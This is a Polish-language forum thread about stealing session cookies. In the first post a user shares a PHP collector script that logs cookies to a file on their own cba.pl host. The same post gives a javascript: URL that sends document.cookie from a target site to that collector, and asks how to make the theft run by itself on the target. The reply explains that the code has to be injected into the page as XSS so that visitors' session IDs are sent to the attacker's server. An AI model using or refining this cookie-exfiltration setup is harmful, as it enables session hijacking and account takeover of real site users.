Pokaż wyniki 1 do 2 z 2

Temat: Kradzież identyfikatora sesji

  1. #1
    Zarejestrowany
    Aug 2013
    Postów
    4

    Domyślnie Kradzież identyfikatora sesji

    Witam,
    Od kilku godzin męczy mnie ta myśl.
    Utworzyłem na serwerze cba plik cookies.html do którego będą zapisywane skradzione identyfikatory sesji.
    Na tej samej stronie wsadziłem taki oto skrypt

    a.php
    Kod php:
    <?php
    $f 
    fopen('cookies.html''a');
    $ip $_SERVER['www.strona_z_ktorej_chce_wykrasc_cookies.pl'];
    $c $_GET['c'];
    fwrite($f$ip.' '.$c."*N* <br />");
    fclose($f);
    ?>
    Wchodzę teraz na stronę z której chcę wykraść cookiesy czyli www.strona_z_ktorej_chce_wykrasc_cookies.pl (ta strona nie istnieje ale to tylko przykład).
    i w pasku adresu wpisuję (używając przeglądarki google chrome):
    Kod:
    javascript:document.location="http://moja_strona.cba.pl/a.php?c=cookie"+document.cookie;
    Po czym wchodzę na: http://moja_strona.cba.pl/cookies.html
    i widzę skradzione cookiesy.

    I teraz pytanie.. Czy jest możliwość żeby zaraz po wejściu na http://moja_strona.cba.pl/a.php
    nastąpiło przekierowanie na http://strona_z_ktorej_chce_wykrasc_cookies.pl i wykonanie na niej kodu
    Kod:
    javascript:document.location="http://moja_strona.cba.pl/a.php?c=cookie"+document.cookie;
    ?

  2. #2
    Zarejestrowany
    Apr 2014
    Postów
    11

    Domyślnie

    Nie wiem czy dobrze cie zrozumiałem ale chyba chodzi ci o "XSS".
    Zeby wykraść użytkownikowi id_sesji to uzytkownik musi wykonać akcje a nie ty, wiec kod musi być wstrzyknięty na strone i po wejsciu użytkownika na strone skrypt pobiera jego id_sesji i wysyła go na twój serwer

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52